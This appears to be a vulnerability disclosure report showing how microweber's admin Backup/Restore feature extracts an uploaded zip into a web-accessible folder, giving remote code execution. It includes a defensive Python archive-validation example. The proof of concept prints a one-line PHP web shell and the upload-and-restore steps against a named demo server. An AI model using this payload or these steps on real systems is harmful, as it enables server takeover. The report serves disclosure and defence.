Abusing Backup/Restore feature to achieve Remote Code Execution in microweber/microweber
Reported on
Mar 9th 2022
Description
An admin can use the Backup module to upload a zip archive containing a malicious PHP file; the restore step extracts it into a web-accessible directory, which leads to RCE.
Proof of Concept
- Log in as admin and navigate to Modules -> Backup: https://demo.microweber.org/demo/admin/view:modules/load_module:admin__backup
- Prepare a malicious PHP file, in this case info2.php, containing: <?php system($_GET['cm']); ?>
- Compress this file to info2php.zip, then click "Upload your backup".
- After the upload succeeds, click Restore, choose "Try to overwrite content by Names & Titles", then Start Restore.
- The system returns "Import format not supported".
- However, the malicious file info2.php has already been unzipped and placed in /userfiles/, where the PHP file is accessible to anyone.
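Defensive illustration, added here and not part of the report or of microweber's own code: a restore handler that inspects every archive entry before anything is extracted (rejecting server-executable files, server config files and paths that escape the target), and extracts only into a staging directory outside the web root. The allowed-extension list, the staging path and the helper names are assumptions made for this example.

```python
import io
import zipfile
from pathlib import Path, PurePosixPath

# Assumed allow-list of formats the importer understands (a placeholder for
# this example, not microweber's real list).
ALLOWED_EXTENSIONS = {".json", ".xml", ".csv"}
# Anything the web server would execute or read as configuration.
FORBIDDEN_EXTENSIONS = {".php", ".phtml", ".phar", ".php3", ".php5", ".phps"}

def check_backup_archive(data: bytes) -> list:
    """Inspect every entry of the uploaded zip without extracting anything.
    Returns a list of problems; an empty list means only expected files are present."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            entry = PurePosixPath(name)
            if name.startswith("/") or "\\" in name or ".." in entry.parts:
                problems.append(f"{name}: path escapes the extraction directory")
            elif info.is_dir():
                continue
            # suffixes (not suffix) also catches double extensions such as x.php.json
            elif entry.name.startswith(".ht") or any(
                    s.lower() in FORBIDDEN_EXTENSIONS for s in entry.suffixes):
                problems.append(f"{name}: server-executable or server-config file")
            elif entry.suffix.lower() not in ALLOWED_EXTENSIONS:
                problems.append(f"{name}: unsupported import format")
    return problems

def restore_backup(data: bytes, staging_dir: str) -> list:
    """Validate first, then extract only into staging_dir, which is assumed to
    lie outside the web root so nothing in it is ever served directly."""
    problems = check_backup_archive(data)
    if problems:
        return problems  # rejected before a single byte reaches the disk
    Path(staging_dir).mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(staging_dir)
    return []

def build_zip(files: dict) -> bytes:
    """Build a small in-memory zip; used only to construct sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()
```

Run against a constructed archive holding the report's info2.php, check_backup_archive rejects it before extraction, while a zip holding only a content.json export passes and is unpacked into the staging directory.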
Impact
Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.
Hi @bobimicroweber, since the report was validated, should I remove the malicious file on the demo server? Or will you reset the site later?
Thank you!